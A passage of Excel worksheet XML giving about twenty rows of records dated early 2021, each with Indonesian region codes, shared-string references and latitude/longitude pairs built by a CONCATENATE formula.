        <v>-709088</v>
      </c>
      <c r="X2802" t="s">
        <v>20708</v>
      </c>
      <c r="Y2802" t="str">
        <f t="shared" si="43"/>
        <v>-7.09088,110.92098</v>
      </c>
    </row>
    <row r="2803" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2803">
        <v>230060</v>
      </c>
      <c r="B2803" s="1">
        <v>44228</v>
      </c>
      <c r="C2803" s="2">
        <v>0.15604166666666666</v>
      </c>
      <c r="D2803" t="s">
        <v>22</v>
      </c>
      <c r="E2803" t="s">
        <v>23</v>
      </c>
      <c r="F2803" t="s">
        <v>9496</v>
      </c>
      <c r="G2803" t="s">
        <v>9497</v>
      </c>
      <c r="H2803" t="s">
        <v>7978</v>
      </c>
      <c r="I2803" t="s">
        <v>8459</v>
      </c>
      <c r="J2803" t="s">
        <v>2627</v>
      </c>
      <c r="L2803" t="s">
        <v>9498</v>
      </c>
      <c r="M2803">
        <v>3218070006</v>
      </c>
      <c r="N2803">
        <v>3218070</v>
      </c>
      <c r="O2803">
        <v>3218</v>
      </c>
      <c r="P2803">
        <v>32</v>
      </c>
      <c r="Q2803" t="s">
        <v>9499</v>
      </c>
      <c r="R2803" t="s">
        <v>9500</v>
      </c>
      <c r="S2803" t="s">
        <v>9500</v>
      </c>
      <c r="T2803" t="s">
        <v>42</v>
      </c>
      <c r="U2803" s="5">
        <v>10865063</v>
      </c>
      <c r="V2803" s="5" t="s">
        <v>16970</v>
      </c>
      <c r="W2803" s="5">
        <v>-764507</v>
      </c>
      <c r="X2803" t="s">
        <v>20709</v>
      </c>
      <c r="Y2803" t="str">
        <f t="shared" si="43"/>
        <v>-7.64507,108.65063</v>
      </c>
    </row>
    <row r="2804" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2804">
        <v>230061</v>
      </c>
      <c r="B2804" s="1">
        <v>44229</v>
      </c>
      <c r="C2804" s="2">
        <v>2.4999999999999998E-2</v>
      </c>
      <c r="D2804" t="s">
        <v>2648</v>
      </c>
      <c r="E2804" t="s">
        <v>23</v>
      </c>
      <c r="G2804" t="s">
        <v>9501</v>
      </c>
      <c r="H2804" t="s">
        <v>26</v>
      </c>
      <c r="J2804" t="s">
        <v>9502</v>
      </c>
      <c r="L2804" t="s">
        <v>9503</v>
      </c>
      <c r="M2804">
        <v>3174040004</v>
      </c>
      <c r="N2804">
        <v>3174040</v>
      </c>
      <c r="O2804">
        <v>3174</v>
      </c>
      <c r="P2804">
        <v>31</v>
      </c>
      <c r="Q2804" t="s">
        <v>5091</v>
      </c>
      <c r="R2804" t="s">
        <v>377</v>
      </c>
      <c r="S2804" t="s">
        <v>32</v>
      </c>
      <c r="T2804" t="s">
        <v>33</v>
      </c>
      <c r="U2804" s="5">
        <v>10679778</v>
      </c>
      <c r="V2804" s="5" t="s">
        <v>16971</v>
      </c>
      <c r="W2804" s="5">
        <v>-616160</v>
      </c>
      <c r="X2804" t="s">
        <v>20710</v>
      </c>
      <c r="Y2804" t="str">
        <f t="shared" si="43"/>
        <v>-6.16160,106.79778</v>
      </c>
    </row>
    <row r="2805" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2805">
        <v>230069</v>
      </c>
      <c r="B2805" s="1">
        <v>44229</v>
      </c>
      <c r="C2805" s="2">
        <v>9.0787037037037041E-2</v>
      </c>
      <c r="D2805" t="s">
        <v>22</v>
      </c>
      <c r="E2805" t="s">
        <v>23</v>
      </c>
      <c r="F2805" t="s">
        <v>9504</v>
      </c>
      <c r="G2805" t="s">
        <v>9505</v>
      </c>
      <c r="H2805" t="s">
        <v>8525</v>
      </c>
      <c r="I2805" t="s">
        <v>9506</v>
      </c>
      <c r="J2805" t="s">
        <v>2627</v>
      </c>
      <c r="L2805" t="s">
        <v>9507</v>
      </c>
      <c r="M2805">
        <v>3271040001</v>
      </c>
      <c r="N2805">
        <v>3271040</v>
      </c>
      <c r="O2805">
        <v>3271</v>
      </c>
      <c r="P2805">
        <v>32</v>
      </c>
      <c r="Q2805" t="s">
        <v>9178</v>
      </c>
      <c r="R2805" t="s">
        <v>9508</v>
      </c>
      <c r="S2805" t="s">
        <v>421</v>
      </c>
      <c r="T2805" t="s">
        <v>42</v>
      </c>
      <c r="U2805" s="5">
        <v>10679571</v>
      </c>
      <c r="V2805" s="5" t="s">
        <v>16972</v>
      </c>
      <c r="W2805" s="5">
        <v>-660490</v>
      </c>
      <c r="X2805" t="s">
        <v>20711</v>
      </c>
      <c r="Y2805" t="str">
        <f t="shared" si="43"/>
        <v>-6.60490,106.79571</v>
      </c>
    </row>
    <row r="2806" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2806">
        <v>230070</v>
      </c>
      <c r="B2806" s="1">
        <v>44229</v>
      </c>
      <c r="C2806" s="2">
        <v>8.7314814814814803E-2</v>
      </c>
      <c r="D2806" t="s">
        <v>22</v>
      </c>
      <c r="E2806" t="s">
        <v>23</v>
      </c>
      <c r="F2806" t="s">
        <v>9509</v>
      </c>
      <c r="G2806" t="s">
        <v>9510</v>
      </c>
      <c r="H2806" t="s">
        <v>26</v>
      </c>
      <c r="I2806" t="s">
        <v>367</v>
      </c>
      <c r="J2806" t="s">
        <v>6509</v>
      </c>
      <c r="L2806" t="s">
        <v>9511</v>
      </c>
      <c r="M2806">
        <v>6305050006</v>
      </c>
      <c r="N2806">
        <v>6305050</v>
      </c>
      <c r="O2806">
        <v>6305</v>
      </c>
      <c r="P2806">
        <v>63</v>
      </c>
      <c r="Q2806" t="s">
        <v>8837</v>
      </c>
      <c r="R2806" t="s">
        <v>8838</v>
      </c>
      <c r="S2806" t="s">
        <v>8839</v>
      </c>
      <c r="T2806" t="s">
        <v>6513</v>
      </c>
      <c r="U2806" s="5">
        <v>11537009</v>
      </c>
      <c r="V2806" s="5" t="s">
        <v>16973</v>
      </c>
      <c r="W2806" s="5">
        <v>-292895</v>
      </c>
      <c r="X2806" t="s">
        <v>20712</v>
      </c>
      <c r="Y2806" t="str">
        <f t="shared" si="43"/>
        <v>-2.92895,115.37009</v>
      </c>
    </row>
    <row r="2807" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2807">
        <v>230071</v>
      </c>
      <c r="B2807" s="1">
        <v>44229</v>
      </c>
      <c r="C2807" s="2">
        <v>8.8657407407407407E-2</v>
      </c>
      <c r="D2807" t="s">
        <v>22</v>
      </c>
      <c r="E2807" t="s">
        <v>23</v>
      </c>
      <c r="F2807" t="s">
        <v>9512</v>
      </c>
      <c r="G2807" t="s">
        <v>9513</v>
      </c>
      <c r="H2807" t="s">
        <v>26</v>
      </c>
      <c r="I2807" t="s">
        <v>424</v>
      </c>
      <c r="J2807" t="s">
        <v>6509</v>
      </c>
      <c r="L2807" t="s">
        <v>9514</v>
      </c>
      <c r="M2807">
        <v>6305050006</v>
      </c>
      <c r="N2807">
        <v>6305050</v>
      </c>
      <c r="O2807">
        <v>6305</v>
      </c>
      <c r="P2807">
        <v>63</v>
      </c>
      <c r="Q2807" t="s">
        <v>8837</v>
      </c>
      <c r="R2807" t="s">
        <v>8838</v>
      </c>
      <c r="S2807" t="s">
        <v>8839</v>
      </c>
      <c r="T2807" t="s">
        <v>6513</v>
      </c>
      <c r="U2807" s="5">
        <v>11537007</v>
      </c>
      <c r="V2807" s="5" t="s">
        <v>16797</v>
      </c>
      <c r="W2807" s="5">
        <v>-292857</v>
      </c>
      <c r="X2807" t="s">
        <v>20537</v>
      </c>
      <c r="Y2807" t="str">
        <f t="shared" si="43"/>
        <v>-2.92857,115.37007</v>
      </c>
    </row>
    <row r="2808" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2808">
        <v>230072</v>
      </c>
      <c r="B2808" s="1">
        <v>44229</v>
      </c>
      <c r="C2808" s="2">
        <v>9.3738425925925919E-2</v>
      </c>
      <c r="D2808" t="s">
        <v>22</v>
      </c>
      <c r="E2808" t="s">
        <v>23</v>
      </c>
      <c r="F2808" t="s">
        <v>9515</v>
      </c>
      <c r="G2808" t="s">
        <v>9516</v>
      </c>
      <c r="H2808" t="s">
        <v>26</v>
      </c>
      <c r="I2808" t="s">
        <v>908</v>
      </c>
      <c r="J2808" t="s">
        <v>2622</v>
      </c>
      <c r="L2808" t="s">
        <v>9517</v>
      </c>
      <c r="M2808">
        <v>3571010007</v>
      </c>
      <c r="N2808">
        <v>3571010</v>
      </c>
      <c r="O2808">
        <v>3571</v>
      </c>
      <c r="P2808">
        <v>35</v>
      </c>
      <c r="Q2808" t="s">
        <v>9255</v>
      </c>
      <c r="R2808" t="s">
        <v>8660</v>
      </c>
      <c r="S2808" t="s">
        <v>8365</v>
      </c>
      <c r="T2808" t="s">
        <v>1221</v>
      </c>
      <c r="U2808" s="5">
        <v>11200888</v>
      </c>
      <c r="V2808" s="5" t="s">
        <v>16974</v>
      </c>
      <c r="W2808" s="5">
        <v>-782512</v>
      </c>
      <c r="X2808" t="s">
        <v>20713</v>
      </c>
      <c r="Y2808" t="str">
        <f t="shared" si="43"/>
        <v>-7.82512,112.00888</v>
      </c>
    </row>
    <row r="2809" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2809">
        <v>230073</v>
      </c>
      <c r="B2809" s="1">
        <v>44229</v>
      </c>
      <c r="C2809" s="2">
        <v>9.5775462962962965E-2</v>
      </c>
      <c r="D2809" t="s">
        <v>22</v>
      </c>
      <c r="E2809" t="s">
        <v>23</v>
      </c>
      <c r="F2809" t="s">
        <v>9518</v>
      </c>
      <c r="G2809" t="s">
        <v>9519</v>
      </c>
      <c r="H2809" t="s">
        <v>26</v>
      </c>
      <c r="I2809" t="s">
        <v>137</v>
      </c>
      <c r="J2809" t="s">
        <v>6038</v>
      </c>
      <c r="L2809" t="s">
        <v>9520</v>
      </c>
      <c r="M2809">
        <v>1206051006</v>
      </c>
      <c r="N2809">
        <v>1206051</v>
      </c>
      <c r="O2809">
        <v>1206</v>
      </c>
      <c r="P2809">
        <v>12</v>
      </c>
      <c r="Q2809" t="s">
        <v>9521</v>
      </c>
      <c r="R2809" t="s">
        <v>9522</v>
      </c>
      <c r="S2809" t="s">
        <v>9523</v>
      </c>
      <c r="T2809" t="s">
        <v>6043</v>
      </c>
      <c r="U2809" s="5">
        <v>9938122</v>
      </c>
      <c r="V2809" s="5" t="s">
        <v>16975</v>
      </c>
      <c r="W2809" s="5">
        <v>219235</v>
      </c>
      <c r="X2809" t="s">
        <v>20714</v>
      </c>
      <c r="Y2809" t="str">
        <f t="shared" si="43"/>
        <v>2.19235,99.38122</v>
      </c>
    </row>
    <row r="2810" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2810">
        <v>230074</v>
      </c>
      <c r="B2810" s="1">
        <v>44229</v>
      </c>
      <c r="C2810" s="2">
        <v>0.10662037037037037</v>
      </c>
      <c r="D2810" t="s">
        <v>22</v>
      </c>
      <c r="E2810" t="s">
        <v>23</v>
      </c>
      <c r="F2810" t="s">
        <v>9524</v>
      </c>
      <c r="G2810" t="s">
        <v>9525</v>
      </c>
      <c r="H2810" t="s">
        <v>8525</v>
      </c>
      <c r="I2810" t="s">
        <v>9526</v>
      </c>
      <c r="J2810" t="s">
        <v>2627</v>
      </c>
      <c r="L2810" t="s">
        <v>9527</v>
      </c>
      <c r="M2810">
        <v>3271040001</v>
      </c>
      <c r="N2810">
        <v>3271040</v>
      </c>
      <c r="O2810">
        <v>3271</v>
      </c>
      <c r="P2810">
        <v>32</v>
      </c>
      <c r="Q2810" t="s">
        <v>9178</v>
      </c>
      <c r="R2810" t="s">
        <v>9508</v>
      </c>
      <c r="S2810" t="s">
        <v>421</v>
      </c>
      <c r="T2810" t="s">
        <v>42</v>
      </c>
      <c r="U2810" s="5">
        <v>10679557</v>
      </c>
      <c r="V2810" s="5" t="s">
        <v>16976</v>
      </c>
      <c r="W2810" s="5">
        <v>-660487</v>
      </c>
      <c r="X2810" t="s">
        <v>20715</v>
      </c>
      <c r="Y2810" t="str">
        <f t="shared" si="43"/>
        <v>-6.60487,106.79557</v>
      </c>
    </row>
    <row r="2811" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2811">
        <v>230075</v>
      </c>
      <c r="B2811" s="1">
        <v>44229</v>
      </c>
      <c r="C2811" s="2">
        <v>0.10795138888888889</v>
      </c>
      <c r="D2811" t="s">
        <v>22</v>
      </c>
      <c r="E2811" t="s">
        <v>23</v>
      </c>
      <c r="F2811" t="s">
        <v>9528</v>
      </c>
      <c r="G2811" t="s">
        <v>9529</v>
      </c>
      <c r="H2811" t="s">
        <v>8525</v>
      </c>
      <c r="I2811" t="s">
        <v>9530</v>
      </c>
      <c r="J2811" t="s">
        <v>2627</v>
      </c>
      <c r="L2811" t="s">
        <v>9527</v>
      </c>
      <c r="M2811">
        <v>3271040001</v>
      </c>
      <c r="N2811">
        <v>3271040</v>
      </c>
      <c r="O2811">
        <v>3271</v>
      </c>
      <c r="P2811">
        <v>32</v>
      </c>
      <c r="Q2811" t="s">
        <v>9178</v>
      </c>
      <c r="R2811" t="s">
        <v>9508</v>
      </c>
      <c r="S2811" t="s">
        <v>421</v>
      </c>
      <c r="T2811" t="s">
        <v>42</v>
      </c>
      <c r="U2811" s="5">
        <v>10679543</v>
      </c>
      <c r="V2811" s="5" t="s">
        <v>16977</v>
      </c>
      <c r="W2811" s="5">
        <v>-660490</v>
      </c>
      <c r="X2811" t="s">
        <v>20711</v>
      </c>
      <c r="Y2811" t="str">
        <f t="shared" si="43"/>
        <v>-6.60490,106.79543</v>
      </c>
    </row>
    <row r="2812" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2812">
        <v>230076</v>
      </c>
      <c r="B2812" s="1">
        <v>44229</v>
      </c>
      <c r="C2812" s="2">
        <v>0.11388888888888889</v>
      </c>
      <c r="D2812" t="s">
        <v>22</v>
      </c>
      <c r="E2812" t="s">
        <v>23</v>
      </c>
      <c r="F2812" t="s">
        <v>9531</v>
      </c>
      <c r="G2812" t="s">
        <v>9532</v>
      </c>
      <c r="H2812" t="s">
        <v>8525</v>
      </c>
      <c r="I2812" t="s">
        <v>9533</v>
      </c>
      <c r="J2812" t="s">
        <v>2627</v>
      </c>
      <c r="L2812" t="s">
        <v>9534</v>
      </c>
      <c r="M2812">
        <v>3271040001</v>
      </c>
      <c r="N2812">
        <v>3271040</v>
      </c>
      <c r="O2812">
        <v>3271</v>
      </c>
      <c r="P2812">
        <v>32</v>
      </c>
      <c r="Q2812" t="s">
        <v>9178</v>
      </c>
      <c r="R2812" t="s">
        <v>9508</v>
      </c>
      <c r="S2812" t="s">
        <v>421</v>
      </c>
      <c r="T2812" t="s">
        <v>42</v>
      </c>
      <c r="U2812" s="5">
        <v>10679573</v>
      </c>
      <c r="V2812" s="5" t="s">
        <v>16978</v>
      </c>
      <c r="W2812" s="5">
        <v>-660493</v>
      </c>
      <c r="X2812" t="s">
        <v>20716</v>
      </c>
      <c r="Y2812" t="str">
        <f t="shared" si="43"/>
        <v>-6.60493,106.79573</v>
      </c>
    </row>
    <row r="2813" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2813">
        <v>230077</v>
      </c>
      <c r="B2813" s="1">
        <v>44229</v>
      </c>
      <c r="C2813" s="2">
        <v>0.10943287037037037</v>
      </c>
      <c r="D2813" t="s">
        <v>22</v>
      </c>
      <c r="E2813" t="s">
        <v>23</v>
      </c>
      <c r="F2813" t="s">
        <v>9535</v>
      </c>
      <c r="G2813" t="s">
        <v>9536</v>
      </c>
      <c r="H2813" t="s">
        <v>26</v>
      </c>
      <c r="I2813" t="s">
        <v>80</v>
      </c>
      <c r="J2813" t="s">
        <v>6509</v>
      </c>
      <c r="L2813" t="s">
        <v>9537</v>
      </c>
      <c r="M2813">
        <v>6305050006</v>
      </c>
      <c r="N2813">
        <v>6305050</v>
      </c>
      <c r="O2813">
        <v>6305</v>
      </c>
      <c r="P2813">
        <v>63</v>
      </c>
      <c r="Q2813" t="s">
        <v>8837</v>
      </c>
      <c r="R2813" t="s">
        <v>8838</v>
      </c>
      <c r="S2813" t="s">
        <v>8839</v>
      </c>
      <c r="T2813" t="s">
        <v>6513</v>
      </c>
      <c r="U2813" s="5">
        <v>11537007</v>
      </c>
      <c r="V2813" s="5" t="s">
        <v>16797</v>
      </c>
      <c r="W2813" s="5">
        <v>-292857</v>
      </c>
      <c r="X2813" t="s">
        <v>20537</v>
      </c>
      <c r="Y2813" t="str">
        <f t="shared" si="43"/>
        <v>-2.92857,115.37007</v>
      </c>
    </row>
    <row r="2814" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2814">
        <v>230078</v>
      </c>
      <c r="B2814" s="1">
        <v>44229</v>
      </c>
      <c r="C2814" s="2">
        <v>0.11105324074074074</v>
      </c>
      <c r="D2814" t="s">
        <v>22</v>
      </c>
      <c r="E2814" t="s">
        <v>23</v>
      </c>
      <c r="F2814" t="s">
        <v>9538</v>
      </c>
      <c r="G2814" t="s">
        <v>9539</v>
      </c>
      <c r="H2814" t="s">
        <v>26</v>
      </c>
      <c r="I2814" t="s">
        <v>878</v>
      </c>
      <c r="J2814" t="s">
        <v>2622</v>
      </c>
      <c r="L2814" t="s">
        <v>9540</v>
      </c>
      <c r="M2814">
        <v>3571010007</v>
      </c>
      <c r="N2814">
        <v>3571010</v>
      </c>
      <c r="O2814">
        <v>3571</v>
      </c>
      <c r="P2814">
        <v>35</v>
      </c>
      <c r="Q2814" t="s">
        <v>9255</v>
      </c>
      <c r="R2814" t="s">
        <v>8660</v>
      </c>
      <c r="S2814" t="s">
        <v>8365</v>
      </c>
      <c r="T2814" t="s">
        <v>1221</v>
      </c>
      <c r="U2814" s="5">
        <v>11200746</v>
      </c>
      <c r="V2814" s="5" t="s">
        <v>16979</v>
      </c>
      <c r="W2814" s="5">
        <v>-782297</v>
      </c>
      <c r="X2814" t="s">
        <v>20717</v>
      </c>
      <c r="Y2814" t="str">
        <f t="shared" si="43"/>
        <v>-7.82297,112.00746</v>
      </c>
    </row>
    <row r="2815" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2815">
        <v>230079</v>
      </c>
      <c r="B2815" s="1">
        <v>44229</v>
      </c>
      <c r="C2815" s="2">
        <v>0.13263888888888889</v>
      </c>
      <c r="D2815" t="s">
        <v>22</v>
      </c>
      <c r="E2815" t="s">
        <v>23</v>
      </c>
      <c r="F2815" t="s">
        <v>9541</v>
      </c>
      <c r="G2815" t="s">
        <v>9542</v>
      </c>
      <c r="H2815" t="s">
        <v>8525</v>
      </c>
      <c r="I2815" t="s">
        <v>9543</v>
      </c>
      <c r="J2815" t="s">
        <v>2627</v>
      </c>
      <c r="L2815" t="s">
        <v>9534</v>
      </c>
      <c r="M2815">
        <v>3271040001</v>
      </c>
      <c r="N2815">
        <v>3271040</v>
      </c>
      <c r="O2815">
        <v>3271</v>
      </c>
      <c r="P2815">
        <v>32</v>
      </c>
      <c r="Q2815" t="s">
        <v>9178</v>
      </c>
      <c r="R2815" t="s">
        <v>9508</v>
      </c>
      <c r="S2815" t="s">
        <v>421</v>
      </c>
      <c r="T2815" t="s">
        <v>42</v>
      </c>
      <c r="U2815" s="5">
        <v>10679537</v>
      </c>
      <c r="V2815" s="5" t="s">
        <v>16980</v>
      </c>
      <c r="W2815" s="5">
        <v>-660489</v>
      </c>
      <c r="X2815" t="s">
        <v>20718</v>
      </c>
      <c r="Y2815" t="str">
        <f t="shared" si="43"/>
        <v>-6.60489,106.79537</v>
      </c>
    </row>
    <row r="2816" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2816">
        <v>230082</v>
      </c>
      <c r="B2816" s="1">
        <v>44229</v>
      </c>
      <c r="C2816" s="2">
        <v>0.14413194444444444</v>
      </c>
      <c r="D2816" t="s">
        <v>22</v>
      </c>
      <c r="E2816" t="s">
        <v>23</v>
      </c>
      <c r="F2816" t="s">
        <v>9544</v>
      </c>
      <c r="G2816" t="s">
        <v>9545</v>
      </c>
      <c r="H2816" t="s">
        <v>8525</v>
      </c>
      <c r="I2816" t="s">
        <v>9546</v>
      </c>
      <c r="J2816" t="s">
        <v>2627</v>
      </c>
      <c r="L2816" t="s">
        <v>9534</v>
      </c>
      <c r="M2816">
        <v>3271040001</v>
      </c>
      <c r="N2816">
        <v>3271040</v>
      </c>
      <c r="O2816">
        <v>3271</v>
      </c>
      <c r="P2816">
        <v>32</v>
      </c>
      <c r="Q2816" t="s">
        <v>9178</v>
      </c>
      <c r="R2816" t="s">
        <v>9508</v>
      </c>
      <c r="S2816" t="s">
        <v>421</v>
      </c>
      <c r="T2816" t="s">
        <v>42</v>
      </c>
      <c r="U2816" s="5">
        <v>10679523</v>
      </c>
      <c r="V2816" s="5" t="s">
        <v>16981</v>
      </c>
      <c r="W2816" s="5">
        <v>-660492</v>
      </c>
      <c r="X2816" t="s">
        <v>20719</v>
      </c>
      <c r="Y2816" t="str">
        <f t="shared" si="43"/>
        <v>-6.60492,106.79523</v>
      </c>
    </row>
    <row r="2817" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2817">
        <v>230085</v>
      </c>
      <c r="B2817" s="1">
        <v>44229</v>
      </c>
      <c r="C2817" s="2">
        <v>0.18680555555555556</v>
      </c>
      <c r="D2817" t="s">
        <v>2648</v>
      </c>
      <c r="E2817" t="s">
        <v>23</v>
      </c>
      <c r="G2817" t="s">
        <v>9547</v>
      </c>
      <c r="H2817" t="s">
        <v>26</v>
      </c>
      <c r="J2817" t="s">
        <v>2627</v>
      </c>
      <c r="L2817" t="s">
        <v>9548</v>
      </c>
      <c r="M2817">
        <v>3275040007</v>
      </c>
      <c r="N2817">
        <v>3275040</v>
      </c>
      <c r="O2817">
        <v>3275</v>
      </c>
      <c r="P2817">
        <v>32</v>
      </c>
      <c r="Q2817" t="s">
        <v>99</v>
      </c>
      <c r="R2817" t="s">
        <v>100</v>
      </c>
      <c r="S2817" t="s">
        <v>41</v>
      </c>
      <c r="T2817" t="s">
        <v>42</v>
      </c>
      <c r="U2817" s="5">
        <v>10701938</v>
      </c>
      <c r="V2817" s="5" t="s">
        <v>16982</v>
      </c>
      <c r="W2817" s="5">
        <v>-624096</v>
      </c>
      <c r="X2817" t="s">
        <v>20720</v>
      </c>
      <c r="Y2817" t="str">
        <f t="shared" si="43"/>
        <v>-6.24096,107.01938</v>
      </c>
    </row>
    <row r="2818" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2818">
        <v>230099</v>
      </c>
      <c r="B2818" s="1">
        <v>44229</v>
      </c>
      <c r="C2818" s="2">
        <v>0.39255787037037032</v>
      </c>
      <c r="D2818" t="s">
        <v>22</v>
      </c>
      <c r="E2818" t="s">
        <v>23</v>
      </c>
      <c r="F2818" t="s">
        <v>9549</v>
      </c>
      <c r="G2818" t="s">
        <v>9550</v>
      </c>
      <c r="H2818" t="s">
        <v>26</v>
      </c>
      <c r="I2818" t="s">
        <v>1005</v>
      </c>
      <c r="J2818" t="s">
        <v>2622</v>
      </c>
      <c r="L2818" t="s">
        <v>9551</v>
      </c>
      <c r="M2818">
        <v>3517070007</v>
      </c>
      <c r="N2818">
        <v>3517070</v>
      </c>
      <c r="O2818">
        <v>3517</v>
      </c>
      <c r="P2818">
        <v>35</v>
      </c>
      <c r="Q2818" t="s">
        <v>9552</v>
      </c>
      <c r="R2818" t="s">
        <v>9552</v>
      </c>
      <c r="S2818" t="s">
        <v>340</v>
      </c>
      <c r="T2818" t="s">
        <v>1221</v>
      </c>
      <c r="U2818" s="5">
        <v>11230218</v>
      </c>
      <c r="V2818" s="5" t="s">
        <v>16983</v>
      </c>
      <c r="W2818" s="5">
        <v>-767629</v>
      </c>
      <c r="X2818" t="s">
        <v>20721</v>
      </c>
      <c r="Y2818" t="str">
        <f t="shared" si="43"/>
        <v>-7.67629,112.30218</v>
      </c>
    </row>
    <row r="2819" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2819">
        <v>230100</v>
      </c>
      <c r="B2819" s="1">
        <v>44229</v>
      </c>
      <c r="C2819" s="2">
        <v>0.40105324074074072</v>
      </c>
      <c r="D2819" t="s">
        <v>22</v>
      </c>
      <c r="E2819" t="s">
        <v>23</v>
      </c>
      <c r="F2819" t="s">
        <v>9553</v>
      </c>
      <c r="H2819" t="s">
        <v>7978</v>
      </c>
      <c r="I2819" t="s">
        <v>7983</v>
      </c>
      <c r="J2819" t="s">
        <v>9554</v>
      </c>
      <c r="L2819" t="s">
        <v>9555</v>
      </c>
      <c r="M2819">
        <v>3172080002</v>
      </c>
      <c r="N2819">
        <v>3172080</v>
      </c>
      <c r="O2819">
        <v>3172</v>
      </c>
      <c r="P2819">
        <v>31</v>
      </c>
      <c r="Q2819" t="s">
        <v>2804</v>
      </c>
      <c r="R2819" t="s">
        <v>141</v>
      </c>
      <c r="S2819" t="s">
        <v>49</v>
      </c>
      <c r="T2819" t="s">
        <v>33</v>
      </c>
      <c r="U2819" s="5">
        <v>10694096</v>
      </c>
      <c r="V2819" s="5" t="s">
        <v>16984</v>
      </c>
      <c r="W2819" s="5">
        <v>-620767</v>
      </c>
      <c r="X2819" t="s">
        <v>20722</v>
      </c>
      <c r="Y2819" t="str">
        <f t="shared" ref="Y2819:Y2882" si="44">CONCATENATE(X2819,",",V2819)</f>
        <v>-6.20767,106.94096</v>
      </c>
    </row>
    <row r="2820" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2820">
        <v>230101</v>
      </c>
      <c r="B2820" s="1">
        <v>44229</v>
      </c>
      <c r="C2820" s="2">
        <v>0.40271990740740743</v>
      </c>
      <c r="D2820" t="s">
        <v>22</v>
      </c>
      <c r="E2820" t="s">
        <v>23</v>
      </c>
      <c r="F2820" t="s">
        <v>9556</v>
      </c>
      <c r="H2820" t="s">
        <v>26</v>
      </c>
      <c r="I2820" t="s">
        <v>137</v>
      </c>
      <c r="J2820" t="s">
        <v>9554</v>
      </c>
      <c r="L2820" t="s">
        <v>250</v>
      </c>
      <c r="M2820">
        <v>3172080002</v>
      </c>
      <c r="N2820">
        <v>3172080</v>
      </c>
      <c r="O2820">
        <v>3172</v>
      </c>
      <c r="P2820">
        <v>31</v>
      </c>
      <c r="Q2820" t="s">
        <v>2804</v>
      </c>
      <c r="R2820" t="s">
        <v>141</v>
      </c>
      <c r="S2820" t="s">
        <v>49</v>
      </c>
      <c r="T2820" t="s">
        <v>33</v>
      </c>
      <c r="U2820" s="5">
        <v>10694076</v>
      </c>
      <c r="V2820" s="5" t="s">
        <v>16985</v>
      </c>
      <c r="W2820" s="5">
        <v>-620926</v>
      </c>
      <c r="X2820" t="s">
        <v>20723</v>
      </c>
      <c r="Y2820" t="str">
        <f t="shared" si="44"/>
        <v>-6.20926,106.94076</v>
      </c>
    </row>
    <row r="2821" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2821">
        <v>230102</v>
      </c>
      <c r="B2821" s="1">
        <v>44229</v>
      </c>
      <c r="C2821" s="2">
        <v>0.86111111111111116</v>
      </c>
      <c r="D2821" t="s">
        <v>2648</v>
      </c>
      <c r="E2821" t="s">
        <v>23</v>
      </c>
      <c r="G2821" t="s">
        <v>9557</v>
      </c>
      <c r="H2821" t="s">
        <v>26</v>
      </c>
      <c r="J2821" t="s">
        <v>8086</v>
      </c>
      <c r="L2821" t="s">
        <v>9558</v>
      </c>
      <c r="M2821">
        <v>3171050005</v>
      </c>
      <c r="N2821">
        <v>3171050</v>
      </c>
      <c r="O2821">
        <v>3171</v>
      </c>
      <c r="P2821">
        <v>31</v>
      </c>
      <c r="Q2821" t="s">
        <v>8057</v>
      </c>
      <c r="R2821" t="s">
        <v>508</v>
      </c>
      <c r="S2821" t="s">
        <v>108</v>
      </c>
      <c r="T2821" t="s">
        <v>33</v>
      </c>
      <c r="U2821" s="5">
        <v>10677435</v>
      </c>
      <c r="V2821" s="5" t="s">
        <v>16986</v>
      </c>
      <c r="W2821" s="5">
        <v>-622905</v>
      </c>
      <c r="X2821" t="s">
        <v>20724</v>
      </c>
      <c r="Y2821" t="str">
        <f t="shared" si="44"/>
        <v>-6.22905,106.77435</v>
      </c>
    </row>
    <row r="2822" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2822">
        <v>230124</v>
      </c>
      <c r="B2822" s="1">
        <v>44229</v>
      </c>
      <c r="C2822" s="2">
        <v>0.9708564814814814</v>
      </c>
      <c r="D2822" t="s">
        <v>85</v>
      </c>
      <c r="E2822" t="s">
        <v>23</v>
      </c>
      <c r="F2822" t="s">
        <v>9559</v>
      </c>
      <c r="G2822" t="s">
        <v>9560</v>
      </c>
      <c r="H2822" t="s">
        <v>26</v>
      </c>
      <c r="J2822" t="s">
        <v>3135</v>
      </c>
      <c r="K2822" t="s">
        <v>9561</v>
      </c>
      <c r="L2822" t="s">
        <v>9562</v>
      </c>
      <c r="M2822">
        <v>3673040010</v>
      </c>
      <c r="N2822">
        <v>3673040</v>
      </c>
      <c r="O2822">
        <v>3673</v>
      </c>
      <c r="P2822">
        <v>36</v>
      </c>
      <c r="Q2822" t="s">
        <v>9563</v>
      </c>
      <c r="R2822" t="s">
        <v>7021</v>
      </c>
      <c r="S2822" t="s">
        <v>7021</v>
      </c>
      <c r="T2822" t="s">
        <v>171</v>
      </c>
      <c r="U2822" s="5">
        <v>10617295</v>
      </c>
      <c r="V2822" s="5" t="s">
        <v>16987</v>
      </c>
      <c r="W2822" s="5">
        <v>-611254</v>
      </c>
      <c r="X2822" t="s">
        <v>20725</v>
      </c>
      <c r="Y2822" t="str">
        <f t="shared" si="44"/>
        <v>-6.11254,106.17295</v>
      </c>
    </row>
    <row r="2823" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2823">
        <v>230133</v>
      </c>
      <c r="B2823" s="1">
        <v>44229</v>
      </c>
      <c r="C2823" s="2">
        <v>0.99861111111111101</v>
      </c>
      <c r="D2823" t="s">
        <v>2648</v>
      </c>
